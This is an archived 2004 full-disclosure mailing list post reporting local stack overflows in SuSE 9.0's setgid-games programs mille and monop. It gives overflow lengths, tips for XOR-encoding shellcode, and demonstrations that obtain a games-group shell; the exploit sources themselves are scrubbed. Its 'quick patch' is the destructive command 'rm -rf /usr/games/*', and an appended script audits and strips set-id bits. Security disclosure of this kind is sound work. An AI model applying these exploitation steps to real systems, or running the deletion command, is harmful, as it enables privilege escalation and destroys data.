Open Source and information security mailing list archives
 
From: narkotix at linuxmail.org (narko tix)
Subject: Suse 9.0 Multiple gid = 20(games) vulnz

                       ----- S3CTI0N 0x01 -----
			 
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
       Pr0gr4m  suid3d t0 games wi7h d3f4ul7.       

-3xpl0i747i0n : 0x01-) m4nu4l-)  112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 3xpl0i747i0n.
                                 us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.

                0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n', '\x90','\220' ch4r4ct3rs.
		    XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 3sp3ci4lly 0x90 4nd \220.
		    Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:

addicted@...s:~/c-hell$ ./env
RET =  ???

addicted@...s:~/c-hell$ /usr/games/mille
--HAND--            --DECK--            |                    ----   ----   -----
P                     89                |        Hand Total     0     0
1 75                --DISCARD--         |                   -----  -----
2 Go                                    |     Overall Total     0     0 
3 Gasoline                              |              Games    0     0
4 Repairs           file:  ??? ??? ??? ?|                              
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| p: pick            q: quit
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| u: use #           o: order hand
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| d: discard #       s: save      
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| w: toggle window   r: reprint
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?|                              
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? sh-2.05b$ uid=1001(addicted) gid=20(games) groups=100(users)



                       ----- S3CTI0N 0x02 -----   

-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz s7ill vuln3r4bl3.
       0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
       Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
                       Us3 y0ur ASCII r3t 4ddr3ss.
		    
		0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like '\x0b'. XOR them.
		       3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
addicted@...s:~/c-hell$ ./env
RET =  ???	     
addicted@...s:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name:  ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$ 

                    ----- S3C7I0N 0x03 -----
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
--------------------------------------------------------------------------------------------------------------------------------------


N4rK07IX

-------------- next part --------------
A non-text attachment was scrubbed...
Name: mille.c
Type: application/octet-stream
Size: 5845 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040417/3990f704/mille.obj
-------------- next part --------------
A non-text attachment was scrubbed...
Name: monopexp.c
Type: application/octet-stream
Size: 5063 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040417/3990f704/monopexp.obj
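
The post's "quick patch" deletes the games outright; a narrower mitigation is to find the binaries under /usr/games that carry a set-id bit and clear it, so an overflow no longer yields gid=20(games). The script below is an added example, not part of the original post or its attachments; the function names and the `audit`/`strip` arguments are assumptions.

```shell
#!/bin/sh
# Added example: audit and de-privilege set-id binaries under a games
# directory. Function names and CLI arguments are hypothetical.

# List every regular file under $1 that has the setuid or setgid bit set.
# One `ls -ld` line per file: mode, owner, group, path.
audit_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec ls -ld {} +
}

# Print the number of set-id regular files under $1.
count_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print \
        | wc -l | tr -d ' '
}

# Clear setuid and setgid on every match under $1. The files stay in
# place and stay executable, but run with the caller's own uid and gid.
strip_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec chmod ug-s {} +
}

# Optional command-line use:  script audit [dir]  |  script strip [dir]
# With no argument the script only defines the functions.
case "${1:-}" in
    audit) audit_setid "${2:-/usr/games}" ;;
    strip) strip_setid "${2:-/usr/games}" ;;
esac
```

Run `audit` first and review the list before `strip`; on a packaged system the permission change should also be recorded in the distribution's permissions policy so that a package update does not restore the bit.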
